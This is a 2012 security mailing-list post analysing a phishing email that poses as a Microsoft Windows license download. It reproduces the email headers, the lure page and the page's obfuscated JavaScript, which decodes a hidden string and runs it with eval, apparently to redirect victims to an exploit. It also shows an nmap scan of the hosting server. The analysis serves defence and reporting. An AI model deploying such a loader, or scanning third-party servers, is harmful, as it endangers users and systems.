[Plug-security] Analysis of a Phishing Email Exploit
Lisa Kachold
lisakachold at obnosis.com
Mon Oct 22 10:04:58 MST 2012
I received a phishing email spoofed from support at obnosis.com. Let's
look into what it does?
Delivered-To: lisakachold at obnosis.com
Received: by 10.64.171.100 with SMTP id at4csp186530iec;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Received: by 10.182.31.43 with SMTP id x11mr6874576obh.68.1350920461345;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Return-Path: <SpencerLevoy at ezweb.ne.jp>
Received: from [2.135.176.89] ([2.135.176.89])
by mx.google.com with ESMTP id r10si10297370obv.209.2012.10.22.08.40.58;
Mon, 22 Oct 2012 08:41:01 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning
SpencerLevoy at ezweb.ne.jp does not designate 2.135.176.89 as permitted
sender) client-ip=2.135.176.89;
Authentication-Results: mx.google.com; spf=softfail (google.com:
domain of transitioning SpencerLevoy at ezweb.ne.jp does not designate
2.135.176.89 as permitted sender) smtp.mail=SpencerLevoy at ezweb.ne.jp
Received: from by lsean.ezweb.ne.jp; Mon, 22 Oct 2012 10:41:00 +0300
Message-ID: <B4F29576.6070405 at lisakachold>
Date: Mon, 22 Oct 2012 10:41:00 +0300
From: <support at obnosis.com>
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; rv:1.9.2.2)
Gecko/20100316 Lightning/1.0b4 Thunderbird/2.0.0.23
MIME-Version: 1.0
To: lisakachold at obnosis.com
Subject: Re: Fwd: Order N 8080409
Content-Type: multipart/alternative;
boundary="------------000400070406090103060003"
This is a multi-part message in MIME format.
--------------000400070406090103060003
Content-Type: text/plain; charset=Windows-1252; format=flowed
Content-Transfer-Encoding: 7bit
Hello,You can download your Microsoft Windows License here -Microsoft
Corporation
--------------000400070406090103060003
Content-Type: text/html; charset=Windows-1252
Content-Transfer-Encoding: 7bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=Windows-1252">
</head>
<body bgcolor="#ffffff" text="#000000">
Hello,<br /><br />
You can download your Microsoft Windows License <a
href="http://private.detlef-kunz.de/page2.htm"> here </a>-<br /><br
/><br />
Microsoft Corporation<br /><br>
</body>
</html>
--------------000400070406090103060003--
*http://private.detlef-kunz.de/page2.htm*
Page2.htm:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
</head>
<body>
<h1><b>Please wait a moment. You will be forwarded..</h1></b>
<h3>Internet Explorer or Mozilla Firefox compatible only </h3><br>
<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}
n="5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="";n=n.split("$@");if(m)for(i=0;i-109!=0;i++){k=i;if(window.document)s+=String["fro"+"mCharCode"](parseInt(n[i],20));}try{fsfewbfew--}catch(dgdsh){ev(s);}}</script>
</body>
</html>
-end-
Anyone want to crack the utf-8 in this ampersand encoded malicious
javascript and tell us peice by peice what this does?
Reference: http://dev.networkerror.org/utf8/
Tool: http://macchiato.com/unicode/convert.html
Javascript Ampersand padding looks like:
"5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s="
I am betting this is an Apple Quicktime embedded exploit:
http://www.youtube.com/watch?v=C6e-shdTvsk
http://private.detlef-kunz.de/ looks like a normal under construction page!
http://whois.domaintools.com/detlef-kunz.de
Immediate Action: Report to private.detlef-kunz.de technical contacts.
[Tech-C]
Type: ROLE
Name: HostEurope GmbH
Address: Welserstrasse 14
PostalCode: 51149
City: Köln
CountryCode: DE
Phone: +49 800 4678387
Fax: +49 1805 663233
Email: <snip>
Changed: 2012-07-12T12:16:13+02:00
*
Non-authoritative answer:
Name: private.detlef-kunz.de
Addresses: 2a01:488:42:1000:57e6:2f69:6d:740
87.230.47.105*
Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-22 09:58 US Mountain
Standard Time
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 09:58
Scanning 87.230.47.105 [4 ports]
Completed Ping Scan at 09:58, 1.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:58
Completed Parallel DNS resolution of 1 host. at 09:58, 0.36s elapsed
Initiating SYN Stealth Scan at 09:58
Scanning vwp3866.webpack.hosteurope.de (87.230.47.105) [1000 ports]
Discovered open port 21/tcp on 87.230.47.105
Discovered open port 143/tcp on 87.230.47.105
Discovered open port 110/tcp on 87.230.47.105
Discovered open port 587/tcp on 87.230.47.105
Discovered open port 993/tcp on 87.230.47.105
Discovered open port 3306/tcp on 87.230.47.105
Discovered open port 80/tcp on 87.230.47.105
Discovered open port 22/tcp on 87.230.47.105
Discovered open port 995/tcp on 87.230.47.105
Discovered open port 465/tcp on 87.230.47.105
Discovered open port 5666/tcp on 87.230.47.105
Completed SYN Stealth Scan at 09:58, 5.49s elapsed (1000 total ports)
Initiating Service scan at 09:58
Analysis indicates a high probability that this is a hacked server.
Anyone want to expand on this?
--
(503) 754-4452 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
**
it-clowns.com
Chief Clown
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20121022/d9cc1997/attachment.html>
More information about the Plug-security
mailing list